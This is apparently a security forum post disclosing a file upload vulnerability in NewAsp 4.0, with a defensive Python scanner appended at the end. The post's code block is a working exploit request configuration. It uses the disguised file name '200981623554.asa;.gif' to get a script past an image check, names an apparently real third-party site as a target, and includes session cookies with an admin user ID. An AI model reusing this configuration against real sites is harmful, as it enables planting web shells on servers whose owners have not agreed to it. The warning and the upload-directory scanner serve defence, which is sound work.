NewAsp (新云) 4.0 upload vulnerability
[tag]newasp[/tag]
The exploit code is as follows:
[code]
url=http://localhost/user/upload.asp
filefield=File1
filefield2=
filename=200981623554.asa;.gif
filename2=
local=
local2=
type=image/gif
type2=image/gif
cookies=ASPSESSIONIDSCQACRSS=ENDNFJMAKMIBLFBNCCBFOEOM; DLER=; DLIP=127%2E0%2E0%2E1; iscookies=0; USER_ID=seraph; CFID=101; CFTOKEN=11846965
name=uploadPic&value=
name=Rename&value=1
url=http://www.yingxiaoseo.com/user/upload.asp?action=save&ChannelID=1&sType=
filefield=File1
filefield2=
filename=200981623554.asa;.gif
filename2=
local=
local2=
type=image/gif
type2=image/gif
cookies=ASPSESSIONIDSCQACRSS=ENDNFJMAKMIBLFBNCCBFOEOM; DLER=; DLIP=127%2E0%2E0%2E1; iscookies=0; USER_ID=admin; CFID=101; CFTOKEN=11846965
name=uploadPic&value=
name=Rename&value=1
[/code]
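This vulnerability is dangerous, so no exploit tool or method is provided for now.
Anyone running this program should set permissions properly or check the upload directory promptly, to avoid getting burned.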
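One way to check the upload directory as advised above, written as an added example and not part of the original post or of NewAsp. It flags stored names shaped like the `200981623554.asa;.gif` value in the request, and the extension lists and function names are assumptions to adapt to the server's own handler mappings.

```python
import os
import re
import tempfile

# Assumed list of extensions mapped to the ASP script engine; adjust per server.
SCRIPT_EXTS = {"asp", "asa", "cer", "cdx"}
# Assumed list of extensions an image upload feature should ever store.
ALLOWED_EXTS = {"gif", "jpg", "jpeg", "png", "bmp"}


def classify(filename):
    """Return the reasons a stored upload name is suspicious (empty list = clean)."""
    reasons = []
    name = filename.lower()
    if ";" in name:
        reasons.append("semicolon in name")
    # Split on '.' and ';' so 'x.asa;.gif' yields the segments x, asa, gif.
    segments = [s for s in re.split(r"[.;]", name) if s]
    hits = sorted(SCRIPT_EXTS.intersection(segments[1:]))
    if hits:
        reasons.append("script extension present: " + ",".join(hits))
    final = name.rsplit(".", 1)[-1] if "." in name else ""
    if final not in ALLOWED_EXTS:
        reasons.append("final extension not allowed: " + (final or "(none)"))
    return reasons


def scan_upload_dir(root):
    """Walk the upload directory and map each flagged relative path to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            reasons = classify(fname)
            if reasons:
                rel = os.path.relpath(os.path.join(dirpath, fname), root)
                findings[rel] = reasons
    return findings


if __name__ == "__main__":
    # Constructed sample directory; the first name is the one from the request above.
    samples = ("200981623554.asa;.gif", "20100309.gif", "photo.asp.jpg", "notes.txt")
    with tempfile.TemporaryDirectory() as d:
        for n in samples:
            open(os.path.join(d, n), "w").close()
        for path, reasons in sorted(scan_upload_dir(d).items()):
            print(path, "->", "; ".join(reasons))
```

Run it against the site's upload directory on a schedule, and also remove script execute permission from that directory so a flagged file cannot run even if it is missed.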